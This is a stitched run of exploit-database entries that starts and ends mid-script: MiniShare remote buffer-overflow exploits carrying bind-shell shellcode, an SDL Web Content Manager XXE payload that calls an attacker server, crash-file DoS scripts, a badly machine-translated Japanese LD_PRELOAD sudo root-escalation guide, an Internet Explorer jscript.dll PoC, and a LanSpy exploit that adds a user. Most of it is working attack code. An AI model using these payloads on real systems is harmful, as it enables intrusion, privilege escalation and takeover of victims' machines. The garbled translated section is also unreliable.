"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))
try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"HEAD " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")
connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"
3. Solution:
This product is deprecated
-->
<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19862
# Category: exploit
1. Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request.
2. Proof of Concept
Exploit:
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))
try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"POST " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")
connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"
3. Solution:
This product is deprecated
-->
######################
# Author Information #
######################
Author : Ahmed Elhady Mohamed
twitter : @Ahmed__ELhady
Company : Canon Security
Date : 25/11/2018
########################
# Software Information #
########################
Affected Software : SDL Web Content Manager
Version: Build 8.5.0
Vendor: SDL Tridion
Software website : https://www.sdl.com
CVE Number: CVE-2018-19371
###############
# Description #
###############
SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network.
#################
# Exploit Steps #
#################
1- Access the application with any user account
2- it will ask you to choose your language preferences
3-the application sent a request to SaveUserSettings web service with XML content in the request body.
4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80
5- intercept the request using Burpsuite proxy tool
6- inject the following payload in the beginning of the XML value.
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM \"http://attackerServer/xxe1.dtd\">%asd;%c;]>
<cdl>&rrr;</cdl>
7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server.
8- send the request to the server.
9- The application server will connect to the attacker server
# Exploit Title: MegaPing
# Date: 15-12-2018
# Vendor Homepage: http://www.magnetosoft.com/
# Software Link: http://www.magnetosoft.com/downloads/win32/megaping_setup.exe
# Exploit Author: Achilles
# Tested Version:
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : MegaPing.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open MegaPing choose from the left side: 'Finger'
# 4.- Paste the content of EVIL.txt into the field: 'Destination Address List'
# 5.- Click 'Start' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Excel Password Recovery Professional
# Date: 15-12-2018
# Vendor Homepage:https://www.recoverlostpassword.com/
# Software Link :https://www.recoverlostpassword.com/downloads/excel_password_recovery_pro_trial.exe
# Exploit Author: Achilles
# Tested Version: 8.2.0.0
# Tested on: Windows 7 64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : Excel_Password_Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Excel Password Recovery Professional
# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Registrations Code'
# 5.- Click 'Register' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 5000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: AnyBurn
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
# 5.- Click 'Create Now' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 10000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
0x00はじめに
共有ライブラリは、スタートアップでプログラムがロードされるライブラリです。共有ライブラリが正しくインストールされた後、その後起動されたすべてのプログラムは、新しい共有ライブラリを自動的に使用します。
0x01共有ライブラリ名
各共有ライブラリには、Sonameという特別な名前があります。 Sonameには接頭辞LIBがあり、ライブラリの接尾辞は.so、その後に期間とバージョン番号が続きます。
動的リンカーは、動的にリンクされたプログラムまたは共有オブジェクトを実行することにより、間接的に実行できます。プログラムld.soおよびld linux.so*プログラムに必要な共有オブジェクト(共有ライブラリ)を見つけてロードし、プログラムを実行するために準備してから実行します。 (ここから読む)
LD_PRELOAD:/etc /ld.so .preloadのように標準セットを上書きする関数を含む共有ライブラリをリストする環境変数です。これらは、Loader/Lib/Ld-Linuxによって実装されています。詳細については、こちらをご覧ください。
0x02実験設定
ログユーザーにはいくつかのsudo許可がある必要があります。これは重要です。そのため、sudoユーザー/sudoユーザーが実行した/usr/bin/findなどのsudoユーザーにいくつかのsudo許可を与えました。しかし、それに加えて、環境変数をsudoとして設定できるデフォルトの構成がいくつかあります
これを行うには、次の手順に従ってください。
visudoを入力して、 /etc /sudoersファイルを開きます
今、ユーザーにいくつかのsudo許可を与えます。私たちの場合、「raj」はsudoersのメンバーになります
raj all=(all:all)nopasswd:/usr/bin/find
次に、デフォルトの構成として以下を追加して、LD_PRELOAD環境を設定します。
デフォルトenv_keep +=ld_preload
0x03許可アップグレード
このような脆弱性を活用するには、すぐに被害者のホストを攻撃してから、特権エスカレーション段階に入る必要があります。 SSHを介して被害者のホストに正常にログインし、SUDO -Lコマンドを使用してそれを検出し、利用情報を取得するとします。強調表示された環境変数は、sudoランニング環境として使用されることに注意してください。
/TMPディレクトリでCプログラムファイルを生成しましょう。
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init(){
unsetenv( 'ld_preload');
SetGid(0);
setuid(0);
system( '/bin/sh');
}
次に、shell.c in /cmpとして保存します
上記のように、それをコンパイルして、Windowsオペレーティングシステムの.dllファイルを使用して.so拡張機能で共有オブジェクトを生成しましょう。以下を入力してください。
gcc -fpic -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo ld_preload=/tmp/shell.so
id
おっと
とても良い、ルートアクセスを受けました。
<!--
There is an out-of-bounds write vulnerability in jscript.dll in JsArrayFunctionHeapSort function. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network.
PoC:
=========================================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
function f0() { }
function f1() {
f2.prototype = arguments;
new f2();
}
function f2() {
Array.prototype.sort.call(this, f0);
}
f1(1, 2, 3);
</script>
<!--
=========================================================
Details:
JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its arguments is the number of elements in the input array/object. The function then allocates a temporary array of the this size, copies all properties of the input array/object into it (where property name is numeric and smaller than the "length" property of the input object) and proceeds to sort the temporary array. Normally, the allocated array is sufficient to store all the properties to be sorted. However, in the case of the attached PoC, where the sorted object prototype is the arguments object, when calculating the number of elements, the number of elements in the arguments object aren't taken into account, which leads to an overflow.
Debug Log:
=========================================================
(1d50.1d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c00003 ebx=07512fc0 ecx=0d1e3008 edx=074faf50 esi=0c3c6f30 edi=07512fc0
eip=6d53a09e esp=096daa44 ebp=096daa6c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!NameTbl::GetValCore+0x54915:
6d53a09e 8901 mov dword ptr [ecx],eax ds:002b:0d1e3008=????????
0:007> k
# ChildEBP RetAddr
00 096daa6c 6d4e5775 jscript!NameTbl::GetValCore+0x54915
01 096daa8c 6d4e66b1 jscript!NameTbl::GetValById+0x5f
02 096daad4 6d551f30 jscript!NameTbl::GetVal+0x112
03 096dab34 6d51d6ae jscript!NameTbl::GetVal+0x50
04 096dac14 6d51d595 jscript!JsArrayFunctionHeapSort+0xe2
05 096dac8c 6d4e7850 jscript!JsArraySort+0x1ed
06 096dacf4 6d4e7730 jscript!NatFncObj::Call+0xe8
07 096dad84 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
08 096dadbc 6d5432dd jscript!VAR::InvokeByDispID+0x56357
09 096dae0c 6d4e7850 jscript!JsFncCall+0xbd
0a 096dae74 6d4e7730 jscript!NatFncObj::Call+0xe8
0b 096daf04 6d4e657c jscript!NameTbl::InvokeInternal+0x2cb
0c 096daff8 6d4e74c1 jscript!VAR::InvokeByName+0x1b9
0d 096db044 6d53ab21 jscript!VAR::InvokeDispName+0x3e
0e 096db074 6d4e4813 jscript!VAR::InvokeByDispID+0x562e9
0f 096db45c 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
10 096db558 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
11 096db5b0 6d5003bb jscript!ScrFncObj::Call+0x7b
12 096db63c 6d4eec30 jscript!ScrFncObj::Construct+0xeb
13 096db6c4 6d53ab8f jscript!NameTbl::InvokeInternal+0x338
14 096db6f8 6d4eeca4 jscript!VAR::InvokeByDispID+0x56357
15 096dbae0 6d4e3f7f jscript!CScriptRuntime::Run+0x1ff8
16 096dbbdc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
17 096dbc34 6d4e3d03 jscript!ScrFncObj::Call+0x7b
18 096dbcc4 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
19 096dbcf8 6d4e4813 jscript!VAR::InvokeByDispID+0x56357
1a 096dc0e0 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
1b 096dc1dc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
1c 096dc234 6d4e4ae7 jscript!ScrFncObj::Call+0x7b
1d 096dc2d8 6d4f32eb jscript!CSession::Execute+0x23d
1e 096dc320 6d4f4d63 jscript!COleScript::ExecutePendingScripts+0x16b
1f 096dc39c 6d4f4b49 jscript!COleScript::ParseScriptTextCore+0x206
20 096dc3c8 6e5c7d14 jscript!COleScript::ParseScriptText+0x29
21 096dc400 6e5c81eb MSHTML!CActiveScriptHolder::ParseScriptText+0x51
22 096dc470 6e27d1d1 MSHTML!CScriptCollection::ParseScriptText+0x1c6
23 096dc55c 6e27cd73 MSHTML!CScriptData::CommitCode+0x31e
24 096dc5dc 6e27d90d MSHTML!CScriptData::Execute+0x232
25 096dc5fc 6e5a4bb6 MSHTML!CHtmScriptParseCtx::Execute+0xed
26 096dc650 6e582f12 MSHTML!CHtmParseBase::Execute+0x201
27 096dc66c 6df9bd5f MSHTML!CHtmPost::Broadcast+0x18e
28 096dc7a4 6e063799 MSHTML!CHtmPost::Exec+0x617
29 096dc7c4 6e0636ff MSHTML!CHtmPost::Run+0x3d
2a 096dc7e0 6e06aef7 MSHTML!PostManExecute+0x61
2b 096dc7f4 6e06bce8 MSHTML!PostManResume+0x7b
2c 096dc824 6e0524b8 MSHTML!CHtmPost::OnDwnChanCallback+0x38
2d 096dc83c 6df4d4f3 MSHTML!CDwnChan::OnMethodCall+0x2f
2e 096dc88c 6df4d072 MSHTML!GlobalWndOnMethodCall+0x1a1
2f 096dc8e0 758962fa MSHTML!GlobalWndProc+0x103
30 096dc90c 75896d3a user32!InternalCallWinProc+0x23
31 096dc984 758977c4 user32!UserCallWinProcCheckWow+0x109
32 096dc9e4 7589788a user32!DispatchMessageWorker+0x3b5
33 096dc9f4 6f34ab7c user32!DispatchMessageW+0xf
34 096dfbc0 6f3b75f8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\iertutil.dll -
35 096dfc80 75b46b7c IEFRAME!LCIETab_ThreadProc+0x3e7
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Internet Explorer\IEShims.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
36 096dfc98 72153a31 iertutil!PrivateCoInternetCombineIUri+0x2bbc
37 096dfcd0 7554343d IEShims!IEShims_SetRedirectRegistryForThread+0x1c1
38 096dfcdc 77d99802 kernel32!BaseThreadInitThunk+0xe
39 096dfd1c 77d997d5 ntdll!__RtlUserThreadStart+0x70
3a 096dfd34 00000000 ntdll!_RtlUserThreadStart+0x1b
0:007> !heap -p -a 0d1e3008
address 0d1e3008 found in
_DPH_HEAP_ROOT @ 7d1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
a893bc8: d1e2fe8 18 - d1e2000 2000
723f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77e30fe6 ntdll!RtlDebugAllocateHeap+0x00000030
77deab8e ntdll!RtlpAllocateHeap+0x000000c4
77d93461 ntdll!RtlAllocateHeap+0x0000023a
75ff9d45 msvcrt!malloc+0x0000008d
6d51d645 jscript!JsArrayFunctionHeapSort+0x00000079
6d51d595 jscript!JsArraySort+0x000001ed
6d4e7850 jscript!NatFncObj::Call+0x000000e8
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d5432dd jscript!JsFncCall+0x000000bd
6d4e7850 jscript!NatFncObj::Call+0x000000e8
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
6d4e657c jscript!VAR::InvokeByName+0x000001b9
6d4e74c1 jscript!VAR::InvokeDispName+0x0000003e
6d53ab21 jscript!VAR::InvokeByDispID+0x000562e9
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d5003bb jscript!ScrFncObj::Construct+0x000000eb
6d4eec30 jscript!NameTbl::InvokeInternal+0x00000338
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d4eeca4 jscript!CScriptRuntime::Run+0x00001ff8
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d4e3d03 jscript!NameTbl::InvokeInternal+0x000002cb
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d4e4ae7 jscript!CSession::Execute+0x0000023d
6d4f32eb jscript!COleScript::ExecutePendingScripts+0x0000016b
-->
#!/usr/bin/python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC) #
# Date: 2018-12-16 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe #
# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe #
# Version: 2.0.1.159 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00 thru \x20 and \x2c\x2d #
# EIP Offset: 680 #
# Non-Participating Modules: lanspy.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created: #
# User: Metasploit Password: MyPassword12 #
#------------------------------------------------------------------------------------------------------------------------------------#
# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode
#Payload size: 626 bytes
shellcode = ""
shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30"
shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54"
shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c"
shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58"
shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f"
shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c"
shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57"
shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42"
shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c"
shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71"
shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53"
shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79"
shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61"
shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71"
shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33"
shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55"
shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31"
shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b"
shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74"
shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44"
shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a"
shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a"
shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a"
shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50"
shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f"
shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35"
shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d"
shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c"
shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35"
shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a"
shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d"
shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30"
shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64"
shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50"
shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70"
shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d"
shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37"
shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50"
shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46"
shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70"
shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67"
shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51"
shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63"
shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32"
shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61"
shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64"
shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30"
shellcode += "\x41\x41"
if len(shellcode) > 633:
exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")
sled = "\x90" * 8
#Necessary to allow shellcode room to operate
stack_adjust = "\x83\xec\x78" * 10
reverse_jmp_long = "\xe9\x5c\xfd\xff\xff"
reverse_jmp_short = "\x41\xeb\xf6\x41"
junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))
#004040AD JMP ECX (lanspy.exe)
eip = "\xad\x40\x40"
payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit
# Date: 16-12-2018
# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html
# Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe
# Exploit Author: Achilles
# Tested Version: 9.3.2
# Tested on: Windows XP SP3
# 1.- Run python code : PassFab_RAR
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PassFab RAR Password Recovery
# 4.- In the new Window click on the key in the upper right corner
# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
# 6.- Click 'Register'and the calculator will open
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/python
#!/usr/bin/env python
buffer = "\x41" * 260
NSEH = "\xeb\x06\x90\x90" #jmp short 6
